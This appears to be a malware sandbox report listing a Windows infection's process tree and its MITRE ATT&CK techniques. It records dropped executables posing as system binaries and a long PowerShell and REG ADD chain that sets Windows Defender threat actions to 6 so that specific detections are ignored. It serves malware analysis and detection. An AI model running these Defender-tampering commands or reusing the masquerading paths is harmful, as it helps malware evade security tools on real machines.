  - - C:\Users\Admin\Pictures\YP5Uep8ezHwfoTicF3GDVPog.exe
      "C:\Users\Admin\Pictures\YP5Uep8ezHwfoTicF3GDVPog.exe"
      4⤵
      PID:5472
    - - C:\Users\Admin\AppData\Local\Temp\7zS2E8E.tmp\Install.exe
        
        .\Install.exe /dQndidvBp "385118" /S
        5⤵
        
        PID:5068
  - - C:\Users\Admin\Pictures\nQesDUtDlOpXjcbDD2DVHZvC.exe
      "C:\Users\Admin\Pictures\nQesDUtDlOpXjcbDD2DVHZvC.exe"
      4⤵
      PID:8528
  - - C:\Users\Admin\Pictures\xwpIL4LjXbcSHlCTUHLAlBkU.exe
      "C:\Users\Admin\Pictures\xwpIL4LjXbcSHlCTUHLAlBkU.exe"
      4⤵
      PID:7248
    - - C:\Users\Admin\AppData\Local\Temp\7zSE8A6.tmp\Install.exe
        
        .\Install.exe /dQndidvBp "385118" /S
        5⤵
        
        PID:6656
  - - C:\Users\Admin\Pictures\EktWUUboOFSQDEnPu10UMAVI.exe
      "C:\Users\Admin\Pictures\EktWUUboOFSQDEnPu10UMAVI.exe"
      4⤵
      PID:4596
  - - C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe
      "C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe" --silent --allusers=0
      4⤵
      PID:1720
    - - C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe
        
        C:\Users\Admin\Pictures\a8bYNMTnUmAVBgla81tQlkaE.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x67dce1d0,0x67dce1dc,0x67dce1e8
        5⤵
        
        PID:8072
- C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe
  "C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe"
  2⤵
  PID:6544
- C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe"
  2⤵
  PID:1380
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5696

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:4244

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:8396

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:8984

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe mP /IEsite_idSMA 385118 /S
1⤵
PID:9116
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:2848
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1416
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:7916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5920
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4696
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2076

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:7580

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:4636

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:6824

C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
1⤵
PID:7224

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:7312

C:\Recovery\WindowsRE\conhost.exe
C:\Recovery\WindowsRE\conhost.exe
1⤵
PID:7672

C:\ProgramData\Chrome\CNSWA.exe
C:\ProgramData\Chrome\CNSWA.exe
1⤵
PID:5356

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:8016

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:8984

C:\Windows\security\cap\chrome.exe
C:\Windows\security\cap\chrome.exe
1⤵
PID:8716

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:5812

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:364

C:\Program Files (x86)\Windows Media Player\lsass.exe
"C:\Program Files (x86)\Windows Media Player\lsass.exe"
1⤵
PID:3800

C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe"
1⤵
PID:1056

C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\lXxNKiV.exe mP /IEsite_idSMA 385118 /S
1⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:768

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:7292

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:6660

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:3244

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:8684

C:\Recovery\WindowsRE\conhost.exe
C:\Recovery\WindowsRE\conhost.exe
1⤵
PID:5144

C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
1⤵
PID:3560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery

Virtualization/Sandbox Evasion